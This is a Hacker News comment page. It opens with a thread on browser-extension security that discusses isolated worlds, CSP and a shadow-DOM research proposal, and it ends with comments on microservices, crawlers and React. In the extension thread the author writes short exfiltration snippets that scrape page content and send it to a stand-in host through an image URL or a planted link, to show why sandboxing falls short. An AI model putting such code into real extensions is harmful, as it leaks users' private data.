aboodman's comments | Hacker News

It's a good idea, and one we thought of and tried to make work when I worked on extensions.

Unfortunately, the DOM itself is so flexible and powerful, that it can be used to exfiltrate information through a variety of mechanisms.

For example, that same extension that only has access to gmail.com's DOM? Well, it can add an image like <img src="evil.org?{secrets}">.
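
A minimal sketch of that kind of exfiltration, assuming a content script that has been granted access to the page (the selector and domain below are made up):

  // Runs as a content script with access to the page's DOM.
  const secret = document.querySelector('.message-body')?.textContent ?? '';
  const img = document.createElement('img');
  // The browser fetches this URL as an ordinary subresource load,
  // carrying the scraped text to a server the extension author controls.
  img.src = 'https://evil.example/collect?d=' + encodeURIComponent(secret);
  document.body.appendChild(img);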

The extension system could try to detect such things, but there are a variety of ways for bad extensions to work around the detections.

-----


Very good points. We proposed a way to deal with DOM manipulation in the paper [1], but Stefan omitted this in the blog post. Specifically, Section 4 of the paper (the "Page access" paragraph) briefly describes this. (Sorry for referring you to the paper, but our wording in the paper is probably better than my attempt to paraphrase here.)

Of course there are other ways malicious extensions can be used to leak data: pick your favorite covert channel. But the idea was to propose APIs (and mechanisms) that are not overtly leaky. (We are early in the process of actually building this, though.)

[1] https://www.usenix.org/conference/hotos15/workshop-program/p...

-----


"To ensure that extensions cannot leak through the page’s DOM, we argue that extensions should instead write to a shadow-copy of the page DOM—any content loading as a result of modifying the shadow runs with the privilege of the extension and not the page. This ensures that the extension’s changes to the page are isolated from that of the page, while giving the appearance of a single layout" Could you elaborate more on this? Do you mean that you'll compare the network requests made from the main and the shadow pages? What if the main script is sensitive to the request receive time? Then the shadow DOM may act differently. From more practical standpoint, having two DOMs for every page will eat even more of my laptop's RAM.

-----


"Do you mean that you'll compare the network requests made from the main and the shadow pages?"

Essentially, yes. Requests from the extension should be treated as if they come from an origin different from the page's. (We could potentially piggy-back on existing notions of security principals, e.g., those Firefox has, to avoid huge performance hits.) And if the extension is tainted, the kinds of requests it can make will be restricted according to the taint (as in COWL [1], likely using CSP for the underlying enforcement).
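
As a rough sketch of how the label-to-CSP mapping could look (policyForLabel is a made-up helper; this is speculation about the mechanism, not an implemented design):

  // Derive a CSP policy from the set of origins an extension's label permits,
  // and apply it to requests attributed to that extension's context.
  function policyForLabel(allowedOrigins: string[]): string {
    const list = allowedOrigins.join(' ') || "'none'";
    // Cover the fetch-like channels the extension's DOM writes could trigger.
    return `default-src ${list}; img-src ${list}; connect-src ${list}`;
  }

  // A label that only permits the extension's own backend:
  const csp = policyForLabel(['https://ext-backend.example']);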

"What if the main script is sensitive to the request receive time? Then the shadow DOM may act differently."

If by main script you mean a script on the page, then there should be no real difference.

"From more practical standpoint, having two DOMs for every page will eat even more of my laptop's RAM."

I hope this won't be so bad down the line (assuming we'd be able to leverage some underlying shadow DOM infrastructure and that it performs relatively well).

[1] http://cowl.ws

-----


Sorry for the slow reply.

I think Chrome already implements part of what you are proposing and calls it "isolated worlds". Chrome extensions don't operate directly on the page's DOM; they have an isolated version of it (https://developer.chrome.com/extensions/content_scripts).

So in principle, we already have the context from which we can decide which network requests to allow or block (this is already used today to allow cross-origin XHR from content scripts).
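
For readers who haven't seen it, the shape of the thing is roughly this (the match pattern and backend URL are placeholders):

  // content.js runs in an "isolated world" against pages it matches,
  // assuming the manifest declares something like:
  //   "content_scripts": [{ "matches": ["https://mail.google.com/*"], "js": ["content.js"] }]
  //   "permissions": ["https://ext-backend.example/*"]
  // It sees the same DOM tree as the page but has its own JS globals,
  // and may issue cross-origin XHRs to origins listed in "permissions".
  const xhr = new XMLHttpRequest();
  xhr.open('GET', 'https://ext-backend.example/rules');
  xhr.send();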

However, it is super gnarly to implement your idea in practice because:

1. There has to be a connection traced from every network request back to the JS context that ultimately caused the request (e.g., by mutating the DOM). This is doable; it's just a lot of work.

2. There can't be any way to execute JavaScript in the page, even with the page's principal. Such mechanisms exist today by design because developers desire them.

3. Even if you do 1 and 2, there are still channels such as hyperlinks. The extension could add a hyperlink and get the user to click on it (see the sketch after this list). I suppose you could try to tie that back to the script context that created or modified the hyperlink.

4. Even if you do 1-3, if you can induce the page script (or any other extension, or the browser, or the user) to request a URL of your design, you win.
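
Here is the sketch of the hyperlink channel from point 3 (hypothetical names again). The request that finally carries the data out is triggered by the user's click rather than directly by the extension's context, which is what makes it hard to attribute:

  // The content script plants an innocuous-looking link that smuggles
  // data out in its query string; the navigation happens on the user's click.
  const secret = document.title;  // stand-in for whatever the page exposes
  const a = document.createElement('a');
  a.href = 'https://evil.example/read-more?d=' + encodeURIComponent(secret);
  a.textContent = 'Read more';
  document.body.appendChild(a);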

Sigh. Still seems fun as a research project to see how close you could get.

-----


Yep, isolated worlds is definitely what we want, and part of the inspiration for the particular (DOM modification) feature we proposed.

I think CSP helps with 1 & 2, unless I'm missing something? (Our labels map down to CSP policies pretty naturally.)

Points 3-4 and phishing, in general, are definitely a concern. Unfortunately, I'm not sure that a great solution that does not get in the way exists, but we'll see how close we can get :)

-----


CSP does help, but it is document-specific, not JS-context-specific. At least in Chrome, tracing the JS context that was responsible for a given network request would be significantly more difficult to implement.

-----


> avoid code sharing wherever possible

Err, wut? It sounds like you are saying that pretty much the one reliable guideline in the history of software has become a bad idea.

(I have come across places in my career where code sharing was not worthwhile, but they have been rare. And I frequently regretted the decision later.)

-----


If you are going to try to separate them out into services later, you need to keep the code as compartmentalized as possible.

Otherwise, when you eventually split them out, you will end up in a situation where each service needs copies of all the files it required before.

That, in turn, is a situation where you will have to extract the shared code into a library and make it general enough to be used and versioned that way.

-----


People have been building multiple applications from a single codebase for a very long time. Put all the targets on a continuous build, add tests, and you're set.

The only sense in which versioning matters at all is that the protocol the applications use to talk to each other has to be versioned, and an application must understand the oldest version of the protocol it could potentially be spoken to over.

But things like Thrift and Protocol Buffers have this feature built in. You shouldn't need to version the actual code...
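
For example, with Protocol Buffers the compatibility story is carried by the schema rather than by versioning the code. A minimal sketch (the message and field names are made up):

  // order.proto (proto2 syntax, common at the time)
  message Order {
    optional int64 id = 1;      // field numbers are the wire contract
    optional string note = 2;
    // Added later: old readers simply skip field numbers they don't know,
    // so old and new binaries can keep exchanging Order messages.
    optional int32 priority = 3;
  }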

-----


The question is about building an application that is easier to split into microservices later.

It all comes down to this: http://www.infoq.com/news/2015/01/microservices-sharing-code

If you have multiple components that depend on the same code and you try to split them into multiple services that are deployed independently, you need to keep the code they depend on in sync.

So making a change to the code shared by multiple services means you have to deploy multiple services for a single change.

I completely agree with you about the protobuf/thrift angle though. If you're in that situation, you are already doing it right.

-----


I think you are misunderstanding how this works. Google isn't "handling" any events at all; your webpage is. Google is instead the source of those events: it is simulating the role of a user.

So the bot loads your webpage into a headless browser and sends it a series of events to simulate a user interacting with it, and waits for navigation requests.

There is probably a whitelist of simulation behaviors:

  * mouseover, then click each <a> node
  * mouseover every pixel
  * mouseover, then change every <select> node
  * mouseover, then click every <button>
  etc...
Caveat: though I worked at Google when this work was being done, I was on a different team and don't have any inside knowledge - just speculating on an approach that would make sense.
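
A toy version of one pass of such a simulation inside the headless browser might look like this (purely illustrative, in the same speculative spirit):

  // Fire synthetic events the way a user might, then let the crawler
  // record any navigations or resource requests the page's handlers trigger.
  for (const el of Array.from(document.querySelectorAll('a, button'))) {
    el.dispatchEvent(new MouseEvent('mouseover', { bubbles: true }));
    el.dispatchEvent(new MouseEvent('click', { bubbles: true, cancelable: true }));
  }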

-----


Did you watch the video? This project replaces everything about UI and layout within your app.

-----


It would be possible to generate basic API documentation from the IDL the browsers actually use internally. It would not necessarily be completely accurate because sometimes browsers don't use IDL for their features, but it would be another tool, and would have helped in this case.

You wouldn't need to even be a member of the browser team to do this, since the relevant data is all open source.

-----


"Component-based file structure. Handling styles, view hierarchy, and business logic all in one file is a step backwards. Poor style reusability is one direct consequence of this approach."

If only there was some way to pull out a hunk of code so that it could be reused. Hm. Somebody should invent that.

-----


Man, Facebook is just crushing it with the open source UI libraries recently.

-----


It depends on the browser.

In Chrome, extensions are sandboxed using techniques similar to those used for web pages.

However, just because they are sandboxed doesn't mean they are safe. It just means they won't be able to get privileges beyond those explicitly granted to them.

Many extensions request very powerful privileges though, like the ability to read and write to web pages you visit. The browser will dutifully grant this privilege if the extension requests it and you allow it. It won't get the ability to run arbitrary native code though (unless it also requests that privilege).
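
Concretely, the privileges are spelled out in the extension's manifest; an (illustrative) manifest like the one below asks for read/write access to every page you visit, and the install prompt reflects that:

  {
    "name": "Example extension",
    "version": "1.0",
    "manifest_version": 2,
    "permissions": ["tabs", "http://*/*", "https://*/*"],
    "content_scripts": [
      { "matches": ["<all_urls>"], "js": ["content.js"] }
    ]
  }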

-----


Err, WebForms is the exact opposite. WebForms is about taking something stateless (HTML) and making it stateful. React takes something stateful (the DOM) and makes it stateless.

-----


That isn't declarative in the same way... that's markup. The kind of "declarative" used in React is more like functional programming. You write programs, using actual code, that compute ("declare") exactly what the UI should look like from top to bottom, given each possible input.

This is in contrast to a model where you mutate an existing UI model each time something interesting happens.
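
A tiny illustration of the difference (just a sketch, not anyone's production code):

  import * as React from 'react';

  // Declarative: recompute the whole description of this piece of UI from
  // its inputs; the library reconciles that description against the real DOM.
  function UnreadBadge({ count }: { count: number }) {
    return count > 0 ? <span className="badge">{count}</span> : null;
  }

  // Mutating style, for contrast: poke the existing UI on each event.
  //   badgeEl.textContent = String(count);
  //   badgeEl.style.display = count > 0 ? '' : 'none';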

-----


Declarative is a vacuous word that means anything you want it to depending on context. We used to call functional programming "functional" and logic programming languages like Prolog "declarative." Then declarative started meaning markup, then declarative started meaning...immutable functional code? In PL, we mostly just avoid the word altogether these days since everyone has a different idea about what it means.

React is closer to an immediate-mode UI model: you write programs that compute exactly what the UI should look like on each frame, rather than mutating a scene graph each time something interesting happens (as occurs in retained-mode UI models). Substitute DOM for scene graph, and the distinction might hold.

But I'm not sure.

-----


I think the reason people started calling React "declarative" was that "functional" was interpreted to mean (purely) functional, with no side effects.

But yes, exactly. React is similar to an immediate-mode graphics API. Except that also has weird connotations, because people think of things like canvas that are very low-level: all you get are lines, arcs, and fills. React's primitives are at the same level of abstraction as the DOM; you just work with them in immediate mode, not retained mode.

-----


If I understand correctly, the DOM is retained, and React efficiently abstracts it back to an immediate-mode API with some state retention, which has benefits since things stay consistent automatically.

In contrast, a UI model like WPF uses (declarative) data binding to achieve something similar, but without as much flexibility and with more verbosity.

I'm working on a system that allows for state retention in an immediate-mode model, though wrapping WPF rather than HTML:

http://research.microsoft.com/en-us/people/smcdirm/managedti...

-----
